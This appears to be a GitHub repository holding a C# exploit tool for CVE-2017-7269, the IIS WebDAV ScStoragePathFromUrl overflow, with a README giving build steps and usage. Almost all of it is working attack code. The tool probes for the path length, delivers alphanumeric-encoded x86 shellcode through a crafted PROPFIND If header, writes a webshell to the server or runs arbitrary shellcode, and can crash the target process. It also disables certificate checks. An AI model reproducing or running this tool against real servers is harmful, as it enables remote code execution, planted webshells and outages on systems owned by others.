├── CVE-2017-7269.cs ├── README.md ├── getshell.png └── shellcode.png /CVE-2017-7269.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.Collections.Generic; 4 | using System.IO; 5 | using System.Web; 6 | using System.Net; 7 | using System.Net.Cache; 8 | using System.Net.Security; 9 | using System.Threading; 10 | using System.Security.Cryptography.X509Certificates; 11 | 12 | class Exploit 13 | { 14 | static Random rnd = new Random(); 15 | static string check_exit_process = "VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397O00WRJKPSSI7KQR72JPXKOXPQZKO2JKO36VXLJM1VZM0LCKNSOKON2KPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJMPNQ03LMLJPXNM1J13OWNMOS2H352CBKOJO0PCQFOUNMOB00NQNWNMP7OBP6OILMKZLMKZ130V15NMP2P0NQP7NMNWOBNV09KPM0A"; 16 | static string check_exit_thread = "VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397O00WRJKPSSI7KQR72JPXKOXPP3GP0PPP36VXLKM1VZM0LCKNSOKON2KPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJMPNQ03LMLJPXNM1J13OWNMOS2H352CBKOJO0PCQFOUNMOB00NQNWNMP7OBP6OILMKZLMKZ130V15NMP2P0NQP7NMNWOBNV09KPM0A"; 17 | private static bool CheckValidationResult(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors errors) { return true; } 18 | static bool stricmp(string s1, string s2) { return string.Equals(s1, s2, StringComparison.OrdinalIgnoreCase); } 19 | static void Help() 20 | { 21 | Console.WriteLine( 22 | @"usage: CVE-2017-7269 [parms] 23 | 24 | Header: 25 | -h set host for [If] header 26 | -p set port for [If] header 27 | -s set scheme for [If] header 28 | -l length of physical path 29 | 30 | WebShell: 31 | -w upload webshell to server 32 | -wp path of webshell to save 33 | 34 | ShellCode: 35 | -c execute the shellcode 36 | 37 | Misc: 38 | -t test vulnerable only. 39 | -e exit process when getshell or test 40 | -k kill target(equals -e and -t) 41 | 42 | eg: 43 | CVE-2017-7269 http://192.168.1.1/ 44 | CVE-2017-7269 http://192.168.1.1/ -l 19 45 | CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https 46 | CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp 47 | CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin 48 | "); 49 | } 50 | static void Main(string[] args) 51 | { 52 | Console.WriteLine("Exploit for CVE-2017-7269(Microsoft IIS WebDav ScStoragePathFromUrl Overflow)."); 53 | Console.WriteLine("Part of GMH's fuck Tools, Code By zcgonvh.\r\n"); 54 | string shellname = ""; 55 | string shellfile = ""; 56 | byte[] shelldata = null; 57 | 58 | string shellcodefile = ""; 59 | byte[] shellcodedata = null; 60 | 61 | byte pathlen = 0; 62 | string IfHeader = ""; 63 | Uri u = null; 64 | string scheme = ""; 65 | string host = ""; 66 | int port = 0; 67 | 68 | bool isexit = false; 69 | bool testmode = false; 70 | 71 | ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(CheckValidationResult); 72 | string alpha = ""; 73 | Exception ex; 74 | HttpWebResponse response = null; 75 | if (args.Length < 1) 76 | { 77 | Help(); 78 | return; 79 | } 80 | try 81 | { 82 | u = new Uri(args[0]); 83 | for (int i = 1; i < args.Length; i++) 84 | { 85 | if (stricmp(args[i], "-h")) { i++; host = args[i]; } 86 | else if (stricmp(args[i], "-p")) { i++; port = int.Parse(args[i]); } 87 | else if (stricmp(args[i], "-s")) { i++; scheme = args[i]; } 88 | else if (stricmp(args[i], "-l")) { i++; pathlen = byte.Parse(args[i]); } 89 | else if (stricmp(args[i], "-w")) { i++; shellfile = args[i]; } 90 | else if (stricmp(args[i], "-wp")) { i++; shellname = args[i]; } 91 | else if (stricmp(args[i], "-c")) { i++; shellcodefile = args[i]; } 92 | else if (stricmp(args[i], "-t")) { testmode = true; } 93 | else if (stricmp(args[i], "-e")) { isexit = true; } 94 | else if (stricmp(args[i], "-k")) { testmode = true; isexit = true; } 95 | else { Help(); return; } 96 | } 97 | } 98 | catch { Console.WriteLine("[x] invalidate parms, try [-help]"); return; } 99 | 100 | try 101 | { 102 | if (shellcodefile != "") 103 | { 104 | shellcodedata = File.ReadAllBytes(shellcodefile); 105 | if (shellcodedata.Length == 0) { shellcodedata = null; }; 106 | } 107 | if (shellfile != "") 108 | { 109 | shelldata = File.ReadAllBytes(shellfile); 110 | if (shellname == "") { throw new Exception("shellpath must be set."); } 111 | if (shelldata.Length == 0) { shelldata = null; }; 112 | } 113 | if (shelldata != null && shellcodedata != null) { throw new Exception("webshell, or shellcode?"); } 114 | if (shelldata == null && shellcodedata == null && !testmode) { throw new Exception("webshell, or shellcode?"); } 115 | } 116 | catch (Exception e) 117 | { 118 | Console.WriteLine("[x] error on init, message: {0}", e.Message); 119 | return; 120 | } 121 | response = GetResponse(u, "GET", null, out ex); 122 | if (response == null) 123 | { 124 | Console.WriteLine("[x] can not connect to {0},error:\n {1}", ex); 125 | return; 126 | } 127 | if (scheme == "") 128 | { 129 | scheme = u.Scheme; 130 | } 131 | if (host == "") 132 | { 133 | host = u.Host; 134 | } 135 | if (port == 0) 136 | { 137 | port = u.Port; 138 | } 139 | 140 | if (pathlen == 0) 141 | { 142 | Console.WriteLine("[+] check length of target path..."); 143 | alpha = check_exit_thread; 144 | byte b = 0; 145 | for (b = 0; b < 114; b++) 146 | { 147 | IfHeader = GetIfHeader(scheme, host, port, b, alpha); 148 | response = GetResponse(u, "PROPFIND", IfHeader, out ex); 149 | if (response != null) 150 | { 151 | if ((int)response.StatusCode == 200) 152 | { 153 | if (response.Headers["X-ZCG-Check"] == "CVE-2017-7269") 154 | { 155 | pathlen = b; 156 | } 157 | else 158 | { 159 | Console.WriteLine("[?] server returns 200 but no header returned."); 160 | } 161 | break; 162 | } 163 | else if ((int)response.StatusCode == 500) 164 | { 165 | Thread.Sleep(100); 166 | continue; 167 | } 168 | else 169 | { 170 | Console.WriteLine("[?] server returns bad status: {0} {1}.", (int)response.StatusCode, response.StatusDescription); 171 | Console.WriteLine("[?] invulnerable or dead?"); 172 | DumpResponse(response); 173 | return; 174 | } 175 | } 176 | else 177 | { 178 | Console.WriteLine("[-] response error on length: {0},message: {1}", b, ex.Message); 179 | } 180 | } 181 | if (b == 114) 182 | { 183 | Console.WriteLine("[x] can not get length of target path!"); 184 | if (response != null) 185 | { 186 | Console.WriteLine("[?] last status code: {0}.", response.StatusCode); 187 | Console.WriteLine("[?] invulnerable or dead?"); 188 | DumpResponse(response); 189 | } 190 | return; 191 | } 192 | } 193 | if (pathlen == 0) 194 | { 195 | Console.WriteLine("[x] can not get length of target path!"); 196 | if (response != null) 197 | { 198 | DumpResponse(response); 199 | } 200 | return; 201 | } 202 | if (isexit) 203 | { 204 | alpha = check_exit_process; 205 | } 206 | else 207 | { 208 | alpha = check_exit_thread; 209 | } 210 | IfHeader = GetIfHeader(scheme, host, port, pathlen, alpha); 211 | response = GetResponse(u, "PROPFIND", IfHeader, out ex); 212 | if (response != null) 213 | { 214 | if ((int)response.StatusCode == 200) 215 | { 216 | if (response.Headers["X-ZCG-Check"] == "CVE-2017-7269") 217 | { 218 | Console.WriteLine("[+] length of target path is: " + pathlen); 219 | } 220 | else 221 | { 222 | Console.WriteLine("[?] server returns 200 but no header returned."); 223 | } 224 | } 225 | else if ((int)response.StatusCode == 500) 226 | { 227 | Console.WriteLine("[x] server returns 500 ,length of target path maybe wrong."); 228 | } 229 | else 230 | { 231 | Console.WriteLine("[?] server returns bad status: {0} {1}.", (int)response.StatusCode, response.StatusDescription); 232 | Console.WriteLine("[?] invulnerable or dead?"); 233 | DumpResponse(response); 234 | return; 235 | } 236 | } 237 | else 238 | { 239 | Console.WriteLine("[x] error on get shell response, message: {0}", ex.Message); 240 | } 241 | if (testmode) 242 | { 243 | Console.WriteLine("[+] check complete."); 244 | return; 245 | } 246 | if (shellcodedata == null) 247 | { 248 | Console.WriteLine("[+] upload webshell to server...."); 249 | alpha = AlphaEncodeWithUnicodeUpperCaseESI(BulidShellCode(shellname, shelldata, pathlen, isexit)); 250 | IfHeader = GetIfHeader(scheme, host, port, pathlen, alpha); 251 | response = GetResponse(u, "PROPFIND", IfHeader, out ex); 252 | if (response != null) 253 | { 254 | if ((int)response.StatusCode == 200) 255 | { 256 | if (response.Headers["X-ZCG-Shell-Status"] == "1") 257 | { 258 | Console.WriteLine("[!] webshell was successfully write to [{0}].", shellname); 259 | } 260 | else if (response.Headers["X-ZCG-Shell-Status"] == "0") 261 | { 262 | Console.WriteLine("[x] path: [{0}] was not writable.", shellname); 263 | } 264 | else 265 | { 266 | Console.WriteLine("[?] server returns 200 but no header returned."); 267 | } 268 | } 269 | else if ((int)response.StatusCode == 500) 270 | { 271 | Console.WriteLine("[x] server returns 500 ,length of target path maybe wrong."); 272 | } 273 | else 274 | { 275 | Console.WriteLine("[?] server returns unknown status: {0} {1}.", (int)response.StatusCode, response.StatusDescription); 276 | DumpResponse(response); 277 | } 278 | } 279 | else 280 | { 281 | Console.WriteLine("[x] error on get shell response, message: {0}", ex.Message); 282 | } 283 | } 284 | else 285 | { 286 | Console.WriteLine("[+] run shellcode on server...."); 287 | alpha = AlphaEncodeWithUnicodeUpperCaseESI(shellcodedata); 288 | IfHeader = GetIfHeader(scheme, host, port, pathlen, alpha); 289 | response = GetResponse(u, "PROPFIND", IfHeader, out ex); 290 | if (response != null) 291 | { 292 | Console.WriteLine("[+] shellcode was send to server, check response manually...."); 293 | DumpResponse(response); 294 | } 295 | else 296 | { 297 | Console.WriteLine("[?] shellcode response returns error message: {0}", ex.Message); 298 | Console.WriteLine("[?] check response manually...."); 299 | } 300 | } 301 | 302 | 303 | 304 | 305 | } 306 | static void DumpResponse(HttpWebResponse response) 307 | { 308 | if (response != null) 309 | { 310 | Console.WriteLine("[+] raw response:"); 311 | Console.WriteLine("HTTP/{0} {1} {2}", response.ProtocolVersion, (int)response.StatusCode, response.StatusDescription); 312 | foreach (string s in response.Headers.AllKeys) 313 | { 314 | Console.WriteLine(s + " : " + response.Headers[s]); 315 | } 316 | Console.WriteLine(); 317 | Console.WriteLine(new StreamReader(response.GetResponseStream()).ReadToEnd()); 318 | } 319 | } 320 | static string GetIfHeader(string scheme, string host, int port, byte pathlen, string shellcode) 321 | { 322 | return string.Format("<{0}://{1}:{2}/{3}{6}> (Not ) <{0}://{1}:{2}/{4}{7}{5}>", scheme, host, port, GetPadding(pathlen), GetPadding(pathlen), shellcode, HttpUtility.UrlEncode("橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬"), HttpUtility.UrlEncode("婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃̀翾Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁")); 323 | } 324 | static HttpWebResponse GetResponse(Uri u, string method, string IfHeader, out Exception exception) 325 | { 326 | HttpWebResponse response = null; 327 | HttpWebRequest request = null; 328 | exception = null; 329 | try 330 | { 331 | request = (HttpWebRequest)WebRequest.Create(u); 332 | if (IfHeader != null) { request.Headers.Add("If", IfHeader); } 333 | request.ContentLength = 0; 334 | request.KeepAlive = false; 335 | request.Method = method; 336 | request.CachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.NoCacheNoStore); 337 | request.ServicePoint.ConnectionLimit = 0xffffff; 338 | response = request.GetResponse() as HttpWebResponse; 339 | } 340 | catch (WebException ex) 341 | { 342 | response = ex.Response as HttpWebResponse; 343 | if (response == null) 344 | { 345 | request.Abort(); 346 | exception = ex; 347 | } 348 | return response; 349 | } 350 | catch (Exception ex) 351 | { 352 | request.Abort(); 353 | exception = ex; 354 | if (response != null) 355 | { 356 | response.Close(); 357 | } 358 | return null; 359 | } 360 | finally 361 | { 362 | request = null; 363 | } 364 | return response; 365 | } 366 | static string GetPadding(byte pathlen) 367 | { 368 | string padding = ""; 369 | string table = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; 370 | for (int i = pathlen; i < 114; i++) 371 | { 372 | padding += table[rnd.Next(0, 62)]; 373 | } 374 | return padding; 375 | } 376 | static byte[] BulidShellCode(string shellname, byte[] shelldata, byte pathlen, bool isexit) 377 | { 378 | int shellnamelen = shellname.Length + 1; 379 | int shellnamelenuni = shellnamelen * 2; 380 | int pathlenuni = pathlen * 2; 381 | int filenamesub = shellnamelenuni + pathlenuni; 382 | int shelldataoff = 0x16f + shellnamelenuni; 383 | List shellcode = new List(); 384 | shellcode.AddRange(new byte[] { 385 | 0x64, 0x8B, 0x35, 0x18, 0x00, 0x00, 0x00, 0x8B, 0x7E, 0x04, 0x57, 0x8B, 0x46, 0x30, 0x8B, 0x40, 386 | 0x0C, 0x8B, 0x40, 0x1C, 0x8B, 0x00, 0x8B, 0x40, 0x08, 0x8B, 0xD8, 0x53, 0x8B, 0xF8, 0x8B, 0x47, 387 | 0x3C, 0x8B, 0x54, 0x07, 0x78, 0x03, 0xD7, 0x8B, 0x4A, 0x18, 0x8B, 0x5A, 0x20, 0x03, 0xDF, 0x49, 388 | 0x8B, 0x34, 0x8B, 0x03, 0xF7, 0xB8, 0x47, 0x65, 0x74, 0x50, 0x39, 0x06, 0x75, 0xF1, 0xB8, 0x72, 389 | 0x6F, 0x63, 0x41, 0x39, 0x46, 0x04, 0x75, 0xE7, 0x8B, 0x5A, 0x24, 0x03, 0xDF, 0x66, 0x8B, 0x0C, 390 | 0x4B, 0x8B, 0x5A, 0x1C, 0x03, 0xDF, 0x8B, 0x04, 0x8B, 0x03, 0xC7, 0x5B, 0x5F, 0x89, 0x47, 0xFC, 391 | 0xE8, 0x00, 0x00, 0x00, 0x00 392 | }); 393 | shellcode.Add(0x90);//nop or int3 394 | shellcode.AddRange(new byte[]{ 395 | 0x5E, 0x8B, 0xCE, 0x81, 0xC1, 0xE9, 0x00, 0x00, 0x00, 0x51, 0x53, 0xFF, 0xD0, 0x8B, 0xCE, 0x81, 396 | 0xC1, 0xF6, 0x00, 0x00, 0x00, 0x51, 0xFF, 0xD0, 0x8B, 0xD8, 0x8B, 0xCE, 0x81, 0xC1, 0x01, 0x01, 397 | 0x00, 0x00, 0x51, 0x53, 0x8B, 0x47, 0xFC, 0xFF, 0xD0, 0x57, 0x56, 0x81, 0xC6, 0x09, 0x01, 0x00, 398 | 0x00, 0x56, 0x83, 0xC6, 0x66, 0x81, 0xEF, 0x4C, 0x05, 0x00, 0x00 399 | }); 400 | if (pathlenuni > 0x7f) 401 | { 402 | shellcode.Add(0x83); 403 | shellcode.Add(0xc7); 404 | shellcode.AddRange(BitConverter.GetBytes(pathlenuni)); 405 | } 406 | else 407 | { 408 | shellcode.Add(0x83); 409 | shellcode.Add(0xc7); 410 | shellcode.Add((byte)pathlenuni); 411 | shellcode.Add(0x90); 412 | shellcode.Add(0x90); 413 | shellcode.Add(0x90); 414 | } 415 | shellcode.Add(0xb9); 416 | shellcode.AddRange(BitConverter.GetBytes(shellnamelenuni)); 417 | shellcode.AddRange(new byte[] { 0xfc, 0xf3, 0xa4 }); 418 | if (filenamesub > 0x7f) 419 | { 420 | shellcode.Add(0x81); 421 | shellcode.Add(0xef); 422 | shellcode.AddRange(BitConverter.GetBytes(pathlenuni)); 423 | } 424 | else 425 | { 426 | shellcode.Add(0x83); 427 | shellcode.Add(0xef); 428 | shellcode.Add((byte)filenamesub); 429 | shellcode.Add(0x90); 430 | shellcode.Add(0x90); 431 | shellcode.Add(0x90); 432 | } 433 | shellcode.AddRange(new byte[]{ 434 | 0x57, 0xFF, 0xD0, 0x83, 0xC4, 0x08, 0x5E, 0x5F, 0x85, 0xC0, 0x74, 0x3A, 0x89, 0x47, 0xF8, 0x50, 435 | 0x8B, 0xCE, 0x81, 0xC1, 0x0D, 0x01, 0x00, 0x00, 0x51, 0x53, 0x8B, 0x47, 0xFC, 0xFF, 0xD0, 0x8B, 436 | 0xCE 437 | }); 438 | shellcode.Add(0x81); 439 | shellcode.Add(0xc1); 440 | shellcode.AddRange(BitConverter.GetBytes(shelldataoff)); 441 | shellcode.AddRange(new byte[]{ 442 | 0x51, 0xFF, 0xD0, 0x83, 0xC4, 0x08, 0x8B, 0xCE, 0x81, 0xC1, 0x13, 0x01, 0x00, 0x00, 0x51, 0x53, 443 | 0x8B, 0x47, 0xFC, 0xFF, 0xD0, 0x8B, 0x4F, 0xF8, 0x51, 0xFF, 0xD0, 0xB0, 0x31, 0xEB, 0x02, 0xB0, 444 | 0x30, 0x8B, 0xCE, 0x81, 0xC1, 0x5C, 0x01, 0x00, 0x00, 0x88, 0x01, 0x81, 0xEF, 0x40, 0x03, 0x00, 445 | 0x00, 0x8B, 0x0F, 0x8B, 0x01, 0x8B, 0x80, 0xA0, 0x00, 0x00, 0x00, 0x51, 0x68, 0xC8, 0x00, 0x00, 446 | 0x00, 0x81, 0xC6, 0x1A, 0x01, 0x00, 0x00, 0x56, 0x6A, 0x00, 0x83, 0xC6, 0x01, 0x56, 0x6A, 0x54, 447 | 0xFF, 0xD0 448 | }); 449 | if (isexit) 450 | { 451 | shellcode.AddRange(new byte[] { 0x6a, 0xff, 0x6a, 0xff, 0x66, 0xb8, 0x0a, 0x01 }); 452 | shellcode.AddRange(new byte[] { 0xBA, 0x00, 0x03, 0xFE, 0x7F, 0xFF, 0x12 }); 453 | } 454 | else 455 | { 456 | shellcode.AddRange(new byte[] { 0x33, 0xc0, 0x50, 0x50, 0x66, 0xb8, 0x0b, 0x01 }); 457 | shellcode.AddRange(new byte[] { 0xBA, 0x00, 0x03, 0xFE, 0x7F, 0xFF, 0x12 }); 458 | } 459 | shellcode.AddRange(new byte[] { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 }); 460 | shellcode.AddRange(new byte[]{ 461 | 0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41, 0x00, 0x6D, 0x73, 0x76, 462 | 0x63, 0x72, 0x74, 0x2E, 0x64, 0x6C, 0x6C, 0x00, 0x5F, 0x77, 0x66, 0x6F, 0x70, 0x65, 0x6E, 0x00, 463 | 0x77, 0x00, 0x00, 0x00, 0x66, 0x70, 0x75, 0x74, 0x73, 0x00, 0x66, 0x63, 0x6C, 0x6F, 0x73, 0x65, 464 | 0x00, 0x00, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x54, 0x79, 0x70, 0x65, 0x3A, 0x20, 465 | 0x74, 0x65, 0x78, 0x74, 0x2F, 0x68, 0x74, 0x6D, 0x6C, 0x0D, 0x0A, 0x43, 0x6F, 0x6E, 0x74, 0x65, 466 | 0x6E, 0x74, 0x2D, 0x4C, 0x65, 0x6E, 0x67, 0x74, 0x68, 0x3A, 0x20, 0x31, 0x33, 0x0D, 0x0A, 0x58, 467 | 0x2D, 0x5A, 0x43, 0x47, 0x2D, 0x53, 0x68, 0x65, 0x6C, 0x6C, 0x2D, 0x53, 0x74, 0x61, 0x74, 0x75, 468 | 0x73, 0x3A, 0x20, 0x3F, 0x0D, 0x0A, 0x0D, 0x0A, 0x43, 0x56, 0x45, 0x2D, 0x32, 0x30, 0x31, 0x37, 469 | 0x2D, 0x37, 0x32, 0x36, 0x39, 0x00 470 | }); 471 | shellcode.AddRange(Encoding.Unicode.GetBytes(shellname)); 472 | shellcode.Add(0); 473 | shellcode.Add(0); 474 | shellcode.AddRange(shelldata); 475 | shellcode.Add(0); 476 | return shellcode.ToArray(); 477 | } 478 | 479 | static string AlphaEncodeWithUnicodeUpperCaseESI(byte[] shellcode) 480 | { 481 | string header = "VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"; 482 | string valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZ"; 483 | StringBuilder alpha = new StringBuilder(header); 484 | for (int j = 0; j < shellcode.Length; j++) 485 | { 486 | byte input = shellcode[j]; 487 | uint A = (uint)((input & 0xf0) >> 4); 488 | uint F = (uint)((input & 0x0f)); 489 | uint i = (uint)(rnd.Next() % valid_chars.Length); 490 | while ((valid_chars[(int)i] & 0x0f) != F) { i = (uint)(++i % valid_chars.Length); } 491 | uint E = (uint)(valid_chars[(int)i] >> 4); 492 | uint D = (uint)((A - E) & 0x0f); 493 | i = (uint)(rnd.Next() % valid_chars.Length); 494 | while ((valid_chars[(int)i] & 0x0f) != D) { i = (uint)(++i % valid_chars.Length); } 495 | uint C = (uint)(valid_chars[(int)i] >> 4); 496 | alpha.Append((char)(byte)((C << 4) + D)); 497 | alpha.Append((char)(byte)((E << 4) + F)); 498 | } 499 | alpha.Append('A'); 500 | return alpha.ToString(); 501 | } 502 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # cve-2017-7269 webshell and shellcode tool 2 | 3 | ### build 4 | 5 | csc cve-2017-7269.cs 6 | 7 | ### usage 8 | 9 | CVE-2017-7269 [parms] 10 | 11 | Header: 12 | -h set host for [If] header 13 | -p set port for [If] header 14 | -s set scheme for [If] header 15 | -l length of physical path 16 | 17 | WebShell: 18 | -w upload webshell to server 19 | -wp path of webshell to save 20 | 21 | ShellCode: 22 | -c execute the shellcode 23 | 24 | Misc: 25 | -t test vulnerable only. 26 | -e exit process when getshell or test 27 | -k kill target(equals -e and -t) 28 | 29 | ### example 30 | 31 | CVE-2017-7269 http://192.168.1.1/ 32 | CVE-2017-7269 http://192.168.1.1/ -l 19 33 | CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https 34 | CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp 35 | CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin 36 | 37 | 38 | -------------------------------------------------------------------------------- /getshell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zcgonvh/cve-2017-7269-tool/ae3ebb43c5c48ad983a67331edd457c6a02f4660/getshell.png -------------------------------------------------------------------------------- /shellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zcgonvh/cve-2017-7269-tool/ae3ebb43c5c48ad983a67331edd457c6a02f4660/shellcode.png --------------------------------------------------------------------------------